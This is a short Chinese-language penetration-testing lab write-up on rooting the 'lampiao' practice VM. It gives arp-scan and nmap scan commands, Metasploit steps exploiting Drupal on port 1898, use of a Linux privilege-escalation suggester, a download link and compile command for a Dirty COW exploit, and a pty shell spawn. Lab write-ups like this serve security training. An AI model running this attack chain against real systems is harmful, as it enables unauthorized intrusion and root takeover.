CSA CCPTP模塊9-實(shí)驗(yàn)練習(xí)
lampiao臟牛漏洞提權(quán)
1.主機(jī)掃描
arp-scan -l

2.端口掃描
nmap -A -sV -p- 192.168.254.135

看到開放了22,80,1898端口。
訪問80端口和1898端口。


在1898端口上發(fā)現(xiàn)了CMS信息。
3.滲透提權(quán)
漏洞發(fā)現(xiàn)有兩種方式,可以網(wǎng)上查找相關(guān)exp或者使用msf
2.msf
開啟msf。(也可在網(wǎng)上找相關(guān)exp)
msfconsole

利用msf上的模塊攻擊
search Drupal

使用第一個(gè)模塊
use 1
設(shè)置參數(shù)
set rhosts 192.168.254.135
set rport 1898

執(zhí)行。
run


上傳漏洞收集腳本到目標(biāo)主機(jī)賦予權(quán)限并執(zhí)行它
漏洞收集腳本:GitHub -
mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

進(jìn)入到/tmp下


執(zhí)行腳本,發(fā)現(xiàn)臟牛漏洞。

上傳exp,進(jìn)行編譯過后py建立一個(gè)交互終端執(zhí)行編譯后的exp
臟牛漏洞
exp:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtcow.cpp -lutil//編譯exp
python -c 'import pty; pty.spawn("/bin/bash")'//開啟py終端




獲取到密碼,登錄root賬戶,提權(quán)成功。
